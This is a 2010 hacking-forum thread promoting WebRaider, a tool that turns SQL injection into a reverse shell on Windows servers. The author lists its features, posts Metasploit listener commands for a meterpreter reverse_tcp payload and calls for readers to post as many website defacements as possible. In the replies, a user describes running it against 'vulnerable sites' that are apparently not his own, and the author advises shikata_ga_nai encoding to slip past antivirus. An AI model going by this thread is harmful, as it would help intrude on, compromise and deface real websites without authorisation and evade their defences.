begood, posted March 3, 2010 (edited March 3, 2010 by begood)

We have been waiting for Mr. Mavituna to release WebRaider since the first day we heard him talk about it. Now, it is finally out and is open source! We were waiting for something like this because as of now, other tools that perform a similar function have different dependencies. This one depends on the tool that we already rely on.

So, what is so special about this tool? For starters, this tool has sponsorship from NetSparker, the tool that claims to be false positive free! Second, it uses a stripped down version of Metasploit! Third, it involves only one request for exploitation and is therefore faster! In fact, the idea behind this tool is simple – get a reverse shell from an SQL Injection without using TFTP, FTP, etc. to upload the initial payload!

Here are a few features of WebRaider:
* It’s only one request therefore faster,
* Simple, you don’t need a tool you can do it manually by using your browser or a simple MITM proxy,
* just copy paste the payload,
* CSRF(able), It’s possible to craft a link and carry out a CSRF attack that will give you a reverse shell
* It’s not fixed, you can change the payload,
* It’s short, Generally not more than 3.500 characters,
* Doesn’t require any application on the target system like FTP, TFTP or debug.exe
* Easy to automate.

Normally during an SQL exploitation, we have to depend on tools such as debug.exe and the HTTP protocol limitation of 64kb’s etc. Now, all of this is easy with WebRaider. It does it all! WebRaider uses a VBScript to encode and decode the binary data, adds some more functions that will make this work when executed on the target system, arranges this SQL injection on one line and that is all!

We haven’t had much time to play around with this beauty. We will keep you updated as and when we play with this! Download WebRaider version 0.2.3.7 here.

begood (Author), posted March 3, 2010 (edited March 3, 2010 by begood)

upload payload via sqli
custom listener examples

CustomListenerSamples

Bash

#!/bin/sh
msfcli3 exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=[YOURIP] LPORT=[PORT] E

Windows Batch

ruby.exe msfcli exploit/multi/handler LHOST=[YOURIP] LPORT=[PORT] PAYLOAD=windows/meterpreter/reverse_tcp E

i.e.

"D:\Program Files\Metasploit\Framework3\bin\ruby.exe" "D:\Documents and Settings\UserXP\Application Data\msf32\msfcli" exploit/multi/handler LHOST=12.12.12.72 LPORT=6666 PAYLOAD=windows/meterpreter/reverse_tcp E

Whitepaper
Weaponized SQLi

//A new haxor generation will rise//

Let me see as many defacements as possible posted in "club showoff"!

PS: you can build the payloads in Metasploit; it works on both Linux and Windows.

Guest Nemessis, posted March 3, 2010

I'm probably the idiot here, but it doesn't pop a shell for me, even though I gave it vulnerable sites.

begood (Author), posted March 3, 2010

> I'm probably the idiot here, but it doesn't pop a shell for me, even though I gave it vulnerable sites.

The default payload is for servers running Windows. Did you check?

Guest Nemessis, posted March 3, 2010

Yes. ASP with MySQL installed. Do you have any site that you tested yourself and that it worked on?

begood (Author), posted March 3, 2010 (edited March 3, 2010 by begood)

> Yes. ASP with MySQL installed. Do you have any site that you tested yourself and that it worked on?

Maybe the server is running an antivirus; why don't you generate a custom payload with Metasploit? encoding = shikata_ga_nai ... say bind_tcp, so that it isn't detected by the AV.

Here are some useful tutorials.

List of shellcodes: http://milw0rm.com/shellcode/

I haven't tested it yet; I need to get hold of a VPN first.

Later edit: ONE MORE THING http://www.mavitunasecurity.com/blog/webraider/

Guest Nemessis, posted March 3, 2010

I hate metasploit. When I wake up I'll go get myself tangled up in it a bit more.